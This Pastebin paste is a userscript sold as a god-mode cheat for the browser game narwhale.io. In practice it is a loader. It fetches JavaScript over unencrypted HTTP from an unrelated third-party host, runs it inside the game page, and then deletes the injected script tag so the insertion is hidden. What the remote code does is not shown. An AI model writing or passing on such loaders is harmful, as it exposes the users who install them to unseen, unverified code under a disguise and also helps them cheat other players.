Advertisement
Guest User

Untitled

a guest
Dec 28th, 2019
1,472
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.03 KB | None | 0 0
  1. // ==UserScript==
  2. // @name NARWHALE.IO MOD HACK CHEAT GODMODE
  3. // @namespace NARWHALE.IO MODS HACKS CHEATS
  4. // @version 1.11
  5. // @description NARWHALE.io Mod 1.11
  6. // @author slithere.com
  7. // @match http://narwhale.io/*
  8. // @require http://code.jquery.com/jquery-1.12.4.min.js
  9. // @grant none
  10. // @connect narwhale.io
  11. // ==/UserScript==
  12.  
  13. var s = document.createElement('script');
  14. s.src = 'https://code.jquery.com/jquery-1.12.3.min.js';
  15. s.onload = function() {
  16. document.head.innerHTML += '<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">';
  17. var s = document.createElement('script');
  18. s.src = 'http://wormax.org/chrome3kafa/narwhaleio.js';
  19. s.onload = function() {
  20. this.parentNode.removeChild(this);
  21. };
  22. (document.head || document.documentElement).appendChild(s);
  23. };
  24. (document.head || document.documentElement).appendChild(s);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement